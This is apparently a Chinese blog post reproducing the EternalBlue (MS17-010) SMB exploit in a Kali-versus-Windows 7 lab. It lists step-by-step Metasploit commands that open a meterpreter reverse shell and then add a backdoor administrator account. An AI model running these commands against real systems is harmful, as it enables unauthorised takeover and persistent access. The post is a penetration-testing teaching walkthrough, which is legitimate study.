永恒之蓝漏洞复现

已于 2022-12-03 22:17:17 修改
阅读量421 收藏 1
点赞数 2
文章标签: 安全 web安全 网络
于 2022-12-02 16:34:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74763043/article/details/128115055
版权

一.永恒之蓝(Eternal Blue)

永恒之蓝是在Windows的SMB服务处理v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二.复现环境

攻击机:Kali 192.168.158.128

靶机:Windows 7 192.168.158.129

实验条件:1.两台机子可以ping通 (如果ping不通检查虚拟机中设置-网络)

 3.防火墙(Windows 7虚拟机)是关闭的

4.在同一局域网

三.复现过程

1.nmap进行端口扫描,看445端口是否开启,如下图扫描到了445端口是开放的,而永恒之蓝就是利用445端口的smb服务,操作系统溢出漏洞。

2.进入MSF框架:    msfconsole

 3.使用ms17_010代码: search ms17_010

 

 4.这里会得到一些模块,我们用到的有

扫描模块:auxiliary/scanner/smb/smb_ms17_010

攻击模块:exploit/windows/smb/ms17_010_eternalblue

使用扫描模块:use 3

设置目标IP:set rhosts 192.168.158.129

执行扫描:run

 出现这条语句说明有漏洞

 

 接下来执行攻击模块 :use 0

如果出现这条语句: 

 则需要输入: set payload windows/x64/meterpreter/reverse_tcp

就可以继续执行攻击指令

设置攻击目标IP:set rhosts 192.168.158.129

执行攻击:run

5.这条指令说明攻击成功:   meterpreter 

 

6.得到靶机控制台:shell

有乱码,输入chcp 65001 解决乱码问题

现在就可以执行想要操作的指令了:

例如:创建一个用户:net user asdf 123456/add

将创建的用户asdf设为管理员: net localgroup administrator asdf /add

OK结束啦~谢谢观看

老丝我能battal
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4072
ms17-010,永恒之蓝漏洞复现
永恒之蓝漏洞复现及防御
wangmenghang的博客
08-29 719
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经济人)公布一大批网络攻击工具、期中包含永恒之蓝工具,“永恒之蓝”利用windows系统的链接:SMB漏洞可以获取漏洞最高权限。5月12日,不法份子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高兴内网、大型企业内网和政府机关中招,被勒索支付高额赎金才能恢复文件。
永恒之蓝 (EternalBlue) 漏洞利用原理详解
volta_xu的博客
06-02 919
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 2612
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 5698
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝复现kaliwin7
最新发布
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
sinat_27757177的博客
10-17 5004
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
渗透测试基础之永恒之蓝漏洞复现
小鱼的家
09-08 1419
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
漏洞复现永恒之蓝漏洞
命运的旋律的博客
12-05 362
永恒之蓝漏洞复现 使用msfconsole来对ms17-010来进行扫描和利用 靶机:win7-x64 测试机:kali 扫描ms17-010漏洞 在kali中启动使用msfconsole启动msfconsole 使用search ms17-010搜索关于ms17-010的模块 先调用搜索到的模块,再查看搜索模块的配置选项 需要设置IP地址,确认设置信息都没用遗漏后,运行扫描 发现漏洞。可以使用...
永恒之蓝漏洞复现流程
09-01
- *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值